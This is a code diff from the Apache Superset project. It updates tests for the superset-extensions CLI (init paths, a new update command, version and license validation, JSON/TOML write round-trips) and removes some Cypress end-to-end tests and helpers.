@@ -187,7 +185,7 @@ def test_init_fails_when_directory_already_exists(
):
    """Test that init fails gracefully when target directory already exists."""
    # Create the directory first
-    existing_dir = isolated_filesystem / "test-org.test-extension"
+    existing_dir = isolated_filesystem / "test-extension"
    existing_dir.mkdir()

    result = cli_runner.invoke(app, ["init"], input=cli_input_both)
@@ -204,7 +202,7 @@ def test_extension_json_content_is_correct(
    result = cli_runner.invoke(app, ["init"], input=cli_input_both)
    assert result.exit_code == 0

-    extension_path = isolated_filesystem / "test-org.test-extension"
+    extension_path = isolated_filesystem / "test-extension"
    extension_json_path = extension_path / "extension.json"

    # Verify the JSON structure and values
@@ -238,7 +236,7 @@ def test_frontend_package_json_content_is_correct(
    result = cli_runner.invoke(app, ["init"], input=cli_input_both)
    assert result.exit_code == 0

-    extension_path = isolated_filesystem / "test-org.test-extension"
+    extension_path = isolated_filesystem / "test-extension"
    package_json_path = extension_path / "frontend" / "package.json"

    # Verify the package.json structure and values
@@ -267,7 +265,7 @@ def test_backend_pyproject_toml_is_created(
    result = cli_runner.invoke(app, ["init"], input=cli_input_both)
    assert result.exit_code == 0

-    extension_path = isolated_filesystem / "test-org.test-extension"
+    extension_path = isolated_filesystem / "test-extension"
    pyproject_path = extension_path / "backend" / "pyproject.toml"

    assert_file_exists(pyproject_path, "backend pyproject.toml")
@@ -305,7 +303,7 @@ def test_gitignore_content_is_correct(cli_runner, isolated_filesystem, cli_input
    result = cli_runner.invoke(app, ["init"], input=cli_input_both)
    assert result.exit_code == 0

-    extension_path = isolated_filesystem / "test-org.test-extension"
+    extension_path = isolated_filesystem / "test-extension"
    gitignore_path = extension_path / ".gitignore"

    assert_file_exists(gitignore_path, ".gitignore")
@@ -330,7 +328,7 @@ def test_init_with_custom_version_and_license(cli_runner, isolated_filesystem):

    assert result.exit_code == 0

-    extension_path = isolated_filesystem / "test-org.my-extension"
+    extension_path = isolated_filesystem / "my-extension"
    extension_json_path = extension_path / "extension.json"

    assert_json_content(
@@ -357,10 +355,10 @@ def test_full_init_workflow_integration(cli_runner, isolated_filesystem):
    assert result.exit_code == 0

    # Verify complete directory structure
-    extension_path = isolated_filesystem / "awesome-org.awesome-charts"
+    extension_path = isolated_filesystem / "awesome-charts"
    expected_structure = create_test_extension_structure(
        isolated_filesystem,
-        "awesome-org.awesome-charts",
+        "awesome-charts",
        include_frontend=True,
        include_backend=True,
    )
@@ -412,7 +410,7 @@ def test_init_non_interactive_with_all_options(cli_runner, isolated_filesystem):
    assert result.exit_code == 0, f"Command failed with output: {result.output}"
    assert "🎉 Extension My Extension (ID: my-org.my-ext) initialized" in result.output

-    extension_path = isolated_filesystem / "my-org.my-ext"
+    extension_path = isolated_filesystem / "my-ext"
    assert_directory_exists(extension_path)
    assert_directory_exists(extension_path / "frontend")
    assert_directory_exists(extension_path / "backend")
@@ -449,7 +447,7 @@ def test_init_frontend_only_with_cli_options(cli_runner, isolated_filesystem):

    assert result.exit_code == 0, f"Command failed with output: {result.output}"

-    extension_path = isolated_filesystem / "frontend-org.frontend-ext"
+    extension_path = isolated_filesystem / "frontend-ext"
    assert_directory_exists(extension_path / "frontend")
    assert not (extension_path / "backend").exists()

@@ -478,7 +476,7 @@ def test_init_backend_only_with_cli_options(cli_runner, isolated_filesystem):

    assert result.exit_code == 0, f"Command failed with output: {result.output}"

-    extension_path = isolated_filesystem / "backend-org.backend-ext"
+    extension_path = isolated_filesystem / "backend-ext"
    assert not (extension_path / "frontend").exists()
    assert_directory_exists(extension_path / "backend")

@@ -505,7 +503,7 @@ def test_init_prompts_for_missing_options(cli_runner, isolated_filesystem):

    assert result.exit_code == 0, f"Command failed with output: {result.output}"

-    extension_path = isolated_filesystem / "default-org.default-ext"
+    extension_path = isolated_filesystem / "default-ext"
    extension_json = load_json_file(extension_path / "extension.json")
    assert extension_json["version"] == "0.1.0"
    assert extension_json["license"] == "Apache-2.0"
superset-extensions-cli/tests/test_cli_update.py (new file, 172 lines)
@@ -0,0 +1,172 @@
|
||||
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.

from __future__ import annotations

import pytest
from superset_extensions_cli.cli import app
from superset_extensions_cli.utils import read_json, read_toml


@pytest.mark.cli
def test_update_syncs_versions(
    cli_runner, isolated_filesystem, extension_with_versions
):
    """Test update syncs frontend and backend versions from extension.json."""
    extension_with_versions(
        isolated_filesystem,
        ext_version="2.0.0",
        frontend_version="1.0.0",
        backend_version="1.0.0",
    )

    result = cli_runner.invoke(app, ["update"])

    assert result.exit_code == 0
    assert "Updated frontend/package.json" in result.output
    assert "Updated backend/pyproject.toml" in result.output

    frontend_pkg = read_json(isolated_filesystem / "frontend" / "package.json")
    assert frontend_pkg["version"] == "2.0.0"

    backend_pyproject = read_toml(isolated_filesystem / "backend" / "pyproject.toml")
    assert backend_pyproject["project"]["version"] == "2.0.0"


@pytest.mark.cli
def test_update_noop_when_all_match(
    cli_runner, isolated_filesystem, extension_with_versions
):
    """Test update reports no changes when everything already matches."""
    extension_with_versions(
        isolated_filesystem,
        ext_version="1.0.0",
        frontend_version="1.0.0",
        backend_version="1.0.0",
    )

    result = cli_runner.invoke(app, ["update"])

    assert result.exit_code == 0
    assert "All files already up to date" in result.output


@pytest.mark.cli
def test_update_fails_without_extension_json(cli_runner, isolated_filesystem):
    """Test update fails when extension.json is missing."""
    result = cli_runner.invoke(app, ["update"])

    assert result.exit_code != 0
    assert "extension.json not found" in result.output


@pytest.mark.cli
def test_update_with_version_flag(
    cli_runner, isolated_filesystem, extension_with_versions
):
    """Test --version updates extension.json first, then syncs all files."""
    extension_with_versions(
        isolated_filesystem,
        ext_version="1.0.0",
        frontend_version="1.0.0",
        backend_version="1.0.0",
    )

    result = cli_runner.invoke(app, ["update", "--version", "3.0.0"])

    assert result.exit_code == 0
    assert "Updated extension.json" in result.output
    assert "Updated frontend/package.json" in result.output
    assert "Updated backend/pyproject.toml" in result.output

    ext = read_json(isolated_filesystem / "extension.json")
    assert ext["version"] == "3.0.0"

    frontend_pkg = read_json(isolated_filesystem / "frontend" / "package.json")
    assert frontend_pkg["version"] == "3.0.0"

    backend_pyproject = read_toml(isolated_filesystem / "backend" / "pyproject.toml")
    assert backend_pyproject["project"]["version"] == "3.0.0"


@pytest.mark.cli
def test_update_with_license_flag(
    cli_runner, isolated_filesystem, extension_with_versions
):
    """Test --license updates license across all files."""
    extension_with_versions(
        isolated_filesystem,
        ext_version="1.0.0",
        frontend_version="1.0.0",
        backend_version="1.0.0",
        ext_license="Apache-2.0",
    )

    result = cli_runner.invoke(app, ["update", "--license", "MIT"])

    assert result.exit_code == 0
    assert "Updated extension.json" in result.output
    assert "Updated frontend/package.json" in result.output
    assert "Updated backend/pyproject.toml" in result.output

    ext = read_json(isolated_filesystem / "extension.json")
    assert ext["license"] == "MIT"

    frontend_pkg = read_json(isolated_filesystem / "frontend" / "package.json")
    assert frontend_pkg["license"] == "MIT"

    backend_pyproject = read_toml(isolated_filesystem / "backend" / "pyproject.toml")
    assert backend_pyproject["project"]["license"] == "MIT"


@pytest.mark.cli
def test_update_version_prompt_default(
    cli_runner, isolated_filesystem, extension_with_versions
):
    """Test --version without value prompts with current version as default."""
    extension_with_versions(
        isolated_filesystem,
        ext_version="1.0.0",
        frontend_version="1.0.0",
        backend_version="1.0.0",
    )

    # Hit enter to accept default; nothing should change
    result = cli_runner.invoke(app, ["update", "--version"], input="\n")

    assert result.exit_code == 0
    assert "All files already up to date" in result.output


@pytest.mark.cli
def test_update_rejects_invalid_version(
    cli_runner, isolated_filesystem, extension_with_versions
):
    """Test --version with an invalid semver string exits with error."""
    extension_with_versions(
        isolated_filesystem,
        ext_version="1.0.0",
    )

    result = cli_runner.invoke(app, ["update", "--version", "not-a-version"])

    assert result.exit_code != 0
    assert "Invalid value" in result.output

    # Verify extension.json was not modified
    ext = read_json(isolated_filesystem / "extension.json")
    assert ext["version"] == "1.0.0"
@@ -207,3 +207,66 @@ def test_validate_npm_with_empty_version_output_raises_error(mock_run, mock_which):
    # semver.compare will raise ValueError for empty version
    with pytest.raises(ValueError):
        validate_npm()


# Version Consistency Tests
@pytest.mark.cli
def test_validate_fails_on_version_mismatch(
    cli_runner, isolated_filesystem, extension_with_versions
):
    """Test validate fails when frontend/backend versions differ from extension.json."""
    extension_with_versions(
        isolated_filesystem,
        ext_version="2.0.0",
        frontend_version="1.0.0",
        backend_version="1.0.0",
    )

    with patch("superset_extensions_cli.cli.validate_npm"):
        result = cli_runner.invoke(app, ["validate"])

    assert result.exit_code != 0
    assert "Metadata mismatch" in result.output
    assert "superset-extensions update" in result.output


@pytest.mark.cli
def test_validate_passes_with_matching_versions(
    cli_runner, isolated_filesystem, extension_with_versions
):
    """Test validate passes when all versions match extension.json."""
    extension_with_versions(
        isolated_filesystem,
        ext_version="1.0.0",
        frontend_version="1.0.0",
        backend_version="1.0.0",
    )

    with patch("superset_extensions_cli.cli.validate_npm"):
        result = cli_runner.invoke(app, ["validate"])

    assert result.exit_code == 0
    assert "Validation successful" in result.output


@pytest.mark.cli
def test_validate_fails_on_license_mismatch(
    cli_runner, isolated_filesystem, extension_with_versions
):
    """Test validate fails when frontend/backend licenses differ from extension.json."""
    extension_with_versions(
        isolated_filesystem,
        ext_version="1.0.0",
        frontend_version="1.0.0",
        backend_version="1.0.0",
        ext_license="Apache-2.0",
        frontend_license="MIT",
        backend_license="MIT",
    )

    with patch("superset_extensions_cli.cli.validate_npm"):
        result = cli_runner.invoke(app, ["validate"])

    assert result.exit_code != 0
    assert "Metadata mismatch" in result.output
    assert "license" in result.output

@@ -20,7 +20,7 @@ from __future__ import annotations
import json

import pytest
-from superset_extensions_cli.utils import read_json, read_toml
+from superset_extensions_cli.utils import read_json, read_toml, write_json, write_toml


# Read JSON Tests
@@ -269,3 +269,32 @@ def test_read_toml_with_permission_denied(isolated_filesystem):
        toml_file.chmod(0o644)
    except (OSError, PermissionError):
        pass


# Write JSON Tests
@pytest.mark.unit
def test_write_json_round_trip(isolated_filesystem):
    """Test write_json then read_json round-trip preserves content."""
    data = {"name": "test-extension", "version": "2.0.0", "nested": {"key": "value"}}
    json_file = isolated_filesystem / "output.json"

    write_json(json_file, data)
    result = read_json(json_file)

    assert result == data


# Write TOML Tests
@pytest.mark.unit
def test_write_toml_round_trip(isolated_filesystem):
    """Test write_toml then read_toml round-trip preserves content."""
    data = {
        "project": {"name": "test-package", "version": "1.0.0"},
        "tool": {"apache_superset_extensions": {"build": {"include": ["src/**/*.py"]}}},
    }
    toml_file = isolated_filesystem / "output.toml"

    write_toml(toml_file, data)
    result = read_toml(toml_file)

    assert result == data
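These round-trips only pass if `write_json`/`write_toml` emit exactly what `read_json`/`read_toml` parse back. A minimal sketch of such helpers, assuming the standard-library `json` module and the third-party `tomli_w` writer; the actual utils module may use a different TOML backend:

```python
import json
from pathlib import Path

import tomli_w  # assumed TOML writer; any dumps()-style backend would do


def write_json(path: Path, data: dict) -> None:
    """Serialize data as indented JSON with a trailing newline."""
    path.write_text(json.dumps(data, indent=2) + "\n", encoding="utf-8")


def write_toml(path: Path, data: dict) -> None:
    """Serialize data as TOML text."""
    path.write_text(tomli_w.dumps(data), encoding="utf-8")
```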

@@ -127,7 +127,6 @@ module.exports = {
  },
  plugins: [
    'import',
    'file-progress',
    'lodash',
    'theme-colors',
    'icons',

@@ -1,171 +0,0 @@
/**
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements. See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership. The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License. You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied. See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */
import { CHART_LIST } from 'cypress/utils/urls';
import { setGridMode, toggleBulkSelect } from 'cypress/utils';
import {
  setFilter,
  interceptBulkDelete,
  interceptUpdate,
  interceptDelete,
  interceptFiltering,
  interceptFavoriteStatus,
} from '../explore/utils';

function orderAlphabetical() {
  setFilter('Sort', 'Alphabetical');
}

function openProperties() {
  cy.get('[aria-label="more"]').eq(0).click();
  cy.getBySel('chart-list-edit-option').click();
}

function openMenu() {
  cy.get('[aria-label="more"]').eq(0).click();
}

function confirmDelete() {
  cy.getBySel('delete-modal-input').type('DELETE');
  cy.getBySel('modal-confirm-button').click();
}

function visitChartList() {
  interceptFiltering();
  interceptFavoriteStatus();
  cy.visit(CHART_LIST);
  cy.wait('@filtering');
  cy.wait('@favoriteStatus');
}

describe('Charts list', () => {
  describe('common actions', () => {
    beforeEach(() => {
      visitChartList();
    });

    it('should bulk delete correctly', () => {
      cy.createSampleCharts([0, 1, 2, 3]);

      interceptBulkDelete();
      toggleBulkSelect();

      // bulk deletes in card-view
      setGridMode('card');
      orderAlphabetical();

      cy.getBySel('skeleton-card').should('not.exist');
      cy.getBySel('styled-card').contains('1 - Sample chart').click();
      cy.getBySel('styled-card').contains('2 - Sample chart').click();
      cy.getBySel('bulk-select-action').contains('Delete').click();
      confirmDelete();
      cy.wait('@bulkDelete');
      cy.getBySel('styled-card')
        .eq(1)
        .should('not.contain', '1 - Sample chart');
      cy.getBySel('styled-card')
        .eq(2)
        .should('not.contain', '2 - Sample chart');

      // bulk deletes in list-view
      setGridMode('list');
      cy.get('.loading').should('not.exist');
      cy.getBySel('table-row').contains('3 - Sample chart').should('exist');
      cy.getBySel('table-row').contains('4 - Sample chart').should('exist');
      cy.get('[data-test="table-row"] input[type="checkbox"]').eq(0).click();
      cy.get('[data-test="table-row"] input[type="checkbox"]').eq(1).click();
      cy.getBySel('bulk-select-action').eq(0).contains('Delete').click();
      confirmDelete();
      cy.wait('@bulkDelete');
      cy.get('.loading').should('exist');
      cy.get('.loading').should('not.exist');
      cy.getBySel('table-row').eq(0).should('not.contain', '3 - Sample chart');
      cy.getBySel('table-row').eq(1).should('not.contain', '4 - Sample chart');
    });

    it('should delete correctly in card mode', () => {
      cy.createSampleCharts([0, 1]);
      interceptDelete();

      // deletes in card-view
      setGridMode('card');
      orderAlphabetical();

      cy.getBySel('styled-card').contains('1 - Sample chart');
      openMenu();
      cy.getBySel('chart-list-delete-option').click();
      confirmDelete();
      cy.wait('@delete');
      cy.getBySel('styled-card')
        .contains('1 - Sample chart')
        .should('not.exist');
    });

    it('should delete correctly in list mode', () => {
      cy.createSampleCharts([2, 3]);
      interceptDelete();
      cy.getBySel('sort-header').contains('Name').click();

      // Modal closes immediately without this
      cy.wait(2000);

      cy.getBySel('table-row').eq(0).contains('3 - Sample chart');
      cy.getBySel('delete').eq(0).click();
      confirmDelete();
      cy.wait('@delete');
      cy.get('.loading').should('exist');
      cy.get('.loading').should('not.exist');
      cy.getBySel('table-row').eq(0).should('not.contain', '3 - Sample chart');
    });

    it('should edit correctly', () => {
      cy.createSampleCharts([0]);
      interceptUpdate();

      // edits in card-view
      setGridMode('card');
      orderAlphabetical();
      cy.getBySel('skeleton-card').should('not.exist');
      cy.getBySel('styled-card').eq(0).contains('1 - Sample chart');

      // change title
      openProperties();
      cy.getBySel('properties-modal-name-input').type(' | EDITED');
      cy.get('button:contains("Save")').click();
      cy.wait('@update');
      cy.getBySel('styled-card').eq(0).contains('1 - Sample chart | EDITED');

      // edits in list-view
      setGridMode('list');
      // Wait for list view to fully render after mode change
      cy.get('.loading').should('not.exist');
      cy.getBySel('table-row').should('be.visible');
      // Target the specific row by chart title to avoid flakiness from row ordering
      cy.getBySel('table-row')
        .contains('1 - Sample chart | EDITED')
        .parents('[data-test="table-row"]')
        .find('[data-test="edit-alt"]')
        .click();
      cy.getBySel('properties-modal-name-input').clear();
      cy.getBySel('properties-modal-name-input').type('1 - Sample chart');
      cy.get('button:contains("Save")').click();
      cy.wait('@update');
      cy.getBySel('table-row').contains('1 - Sample chart').should('exist');
    });
  });
});
@@ -1,42 +0,0 @@
/**
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements. See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership. The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License. You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied. See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */

import { DATASET_LIST_PATH } from 'cypress/utils/urls';

describe('Dataset list', () => {
  before(() => {
    cy.visit(DATASET_LIST_PATH);
  });

  xit('should open Explore on dataset name click', () => {
    cy.intercept('**/api/v1/explore/**').as('explore');
    cy.get('[data-test="listview-table"] [data-test="internal-link"]')
      .contains('birth_names')
      .click();
    cy.wait('@explore');
    cy.get('[data-test="datasource-control"] .title-select').contains(
      'birth_names',
    );
    cy.get('.metric-option-label').first().contains('COUNT(*)');
    cy.get('.column-option-label').first().contains('ds');
    cy.get('[data-test="fast-viz-switcher"] > div:not([role="button"]')
      .contains('Table')
      .should('be.visible');
  });
});
@@ -23,18 +23,6 @@ export function interceptFiltering() {
  cy.intercept('GET', `**/api/v1/chart/?q=*`).as('filtering');
}

-export function interceptBulkDelete() {
-  cy.intercept('DELETE', `**/api/v1/chart/?q=*`).as('bulkDelete');
-}
-
-export function interceptDelete() {
-  cy.intercept('DELETE', `**/api/v1/chart/*`).as('delete');
-}
-
-export function interceptFavoriteStatus() {
-  cy.intercept('GET', '**/api/v1/chart/favorite_status/*').as('favoriteStatus');
-}
-
export function interceptUpdate() {
  cy.intercept('PUT', `**/api/v1/chart/*`).as('update');
}
@@ -43,32 +31,13 @@ export const interceptV1ChartData = (alias = 'v1Data') => {
  cy.intercept('**/api/v1/chart/data*').as(alias);
};

export function interceptExploreJson(alias = 'getJson') {
  cy.intercept('POST', `**/superset/explore_json/**`).as(alias);
}

export const interceptFormDataKey = () => {
  cy.intercept('POST', '**/api/v1/explore/form_data').as('formDataKey');
};

-export function interceptExploreGet() {
+function interceptExploreGet() {
  cy.intercept({
    method: 'GET',
    url: /.*\/api\/v1\/explore\/\?(form_data_key|dashboard_page_id|slice_id)=.*/,
  }).as('getExplore');
}

export function setFilter(filter: string, option: string) {
  interceptFiltering();

  cy.get(`[aria-label^="${filter}"]`).first().click();
  cy.get(`.ant-select-item-option[title="${option}"]`).first().click({
    force: true,
  });

  cy.wait('@filtering');
}

export function saveChartToDashboard(chartName: string, dashboardName: string) {
  interceptDashboardGet();
  interceptUpdate();

@@ -1,73 +0,0 @@
/**
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements. See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership. The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License. You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied. See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */
import { selectResultsTab } from './sqllab.helper';

describe.skip('SqlLab datasource panel', () => {
  beforeEach(() => {
    cy.visit('/sqllab');
  });

  // TODO the test below is flaky, and has been disabled for the time being
  // (notice the `it.skip`)
  it('creates a table preview when a database, schema, and table are selected', () => {
    cy.intercept('**/superset/table/**').as('tableMetadata');

    // it should have dropdowns to select database, schema, and table
    cy.get('.sql-toolbar .Select').should('have.length', 3);

    cy.get('.sql-toolbar .table-schema').should('not.exist');
    cy.get('[data-test="filterable-table-container"]').should('not.exist');

    cy.get('.sql-toolbar .Select')
      .eq(0) // database select
      .within(() => {
        // note: we have to set force: true because the input is invisible / cypress throws
        cy.get('input').type('main{enter}', { force: true });
      });

    cy.get('.sql-toolbar .Select')
      .eq(1) // schema select
      .within(() => {
        cy.get('input').type('main{enter}', { force: true });
      });

    cy.get('.sql-toolbar .Select')
      .eq(2) // table select
      .within(() => {
        cy.get('input').type('birth_names{enter}', { force: true });
      });

    cy.wait('@tableMetadata');

    cy.get('.sql-toolbar .table-schema').should('have.length', 1);
    selectResultsTab().should('have.length', 1);

    // add another table and check for added schema + preview
    cy.get('.sql-toolbar .Select')
      .eq(2)
      .within(() => {
        cy.get('input').type('logs{enter}', { force: true });
      });

    cy.wait('@tableMetadata');

    cy.get('.sql-toolbar .table-schema').should('have.length', 2);
    selectResultsTab().should('have.length', 2);
  });
});
Some files were not shown because too many files have changed in this diff.